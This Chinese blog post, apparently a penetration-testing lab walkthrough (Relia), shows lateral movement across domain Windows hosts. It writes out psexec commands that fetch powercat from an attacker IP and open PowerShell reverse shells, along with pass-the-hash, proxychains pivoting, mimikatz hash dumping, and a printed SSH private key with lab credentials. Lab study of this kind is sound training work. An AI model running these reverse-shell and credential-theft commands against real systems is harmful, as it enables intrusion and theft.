Challenge 2 - Relia(10)
Challenge 2 - Relia(10)
上一章節已經拿到 Relia.com 網域的 Domain Admin,所以接下來就是將網域相關的 Windows 機器一台一台拿下,下一台先將外網的最後一台 .189 拿下,攻擊順序表如下
直接使用 impacket-psexec 進去也可以,但是總覺得 CLI 介面輸出太慢,所以一樣使用 impacket-psexec 但是直接建立一個 Reverse Shell 回來的指令
impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@192.168.157.189 "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.202/tools/powercat.ps1');powercat -c 192.168.45.202 -p 4444 -e powershell"
whoami,主機名稱,IP 資訊與 flag 輸出如下,這一台僅有 proof.txt 且是雙網卡
更新攻擊列表完成 .189,下一台選定內網的 .11
透過 impacket-psexec 先進 191,然後搭建 chisel,之後直接透過 proxychains 使用 impacket-psexec 進去 .30
└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.170.30
這一台僅有 proof.txt
後續枚舉僅發現 administrator HASH 有用的資訊而已,其他沒有發現
更新攻擊列表,選定下一台為 relai.com 網域的 DC
直接透過 proxychains 使用 impacket-psexec 建立一個 Reverse shell 回來,└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.170.6 "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.224/tools/powercat.ps1');powercat -c 192.168.45.224 -p 4444 -e powershell"
DC 一樣僅有 proof.txt
DC 後續枚舉沒有發現有用的資訊
僅多紀錄 administrator 的 NTLM HASH
測試看看 HASH,└─$ impacket-psexec -hashes :60446f9e333abfda8c548cbe11daedc2 relia.com/administrator@192.168.210.189,看來沒有問題
更新攻擊順序表,下一個目標是 Relia 公司內的最後一台 Windows 機器
更新帳號密碼表
最後一台 Windows 主機是 WK02,有開 3389 RDP,這一台改採用 RDP 進去,└─$ proxychains4 -q xfreerdp -v:172.16.170.15 -u:'relia\administrator' -p:'vau!XCKjNQBv2$' -drive:lab2,/home/kali/lab2/15
使用者 milana 的桌面上有 proof.txt,通常不放在 administrator 的桌面就代表這一台有鬼
果然在 milana 的 Documents 目錄下發現 Keepass 密碼管理器的資料庫
且在垃圾桶內發現 gpo_mod & sarah_ssh 檔案
mimikatz.exe 發現 offsec 的 NTLM HASH
解解看,└─$ hashcat -m 1000 cf998001c44803b490a46f363a2ca812 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force,解不出來
裡面有一組 sarah 的密碼與 Notes 裡面寫了 Private Key
sarah:placeholder
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAwAAAJgtoEZgLaBG
YAAAAAtzc2gtZWQyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAw
AAAECk3NMSFKJMauIwp/DPYEhMV4980aMdDOlfIlTq3qy4SkSFGA7D4B3Cvr5H8Dng2Dvl
YrVWwfV/7GWhjAhsWegDAAAADnRlc3RzQGhhdC13b3JrAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
另外垃圾桶內的 sarah_ssh.zip 解開來是 id_ed25519 內容如下
比對 Keepass 資料庫內的 Notes 是一樣的 Private Key
更新攻擊列表,至此完成了 Relia 公司內所有的 Windows 機器,剩下兩台內網的 Linux 機器
密碼帳號列表更新如下,外加一組 Private Key
留言
張貼留言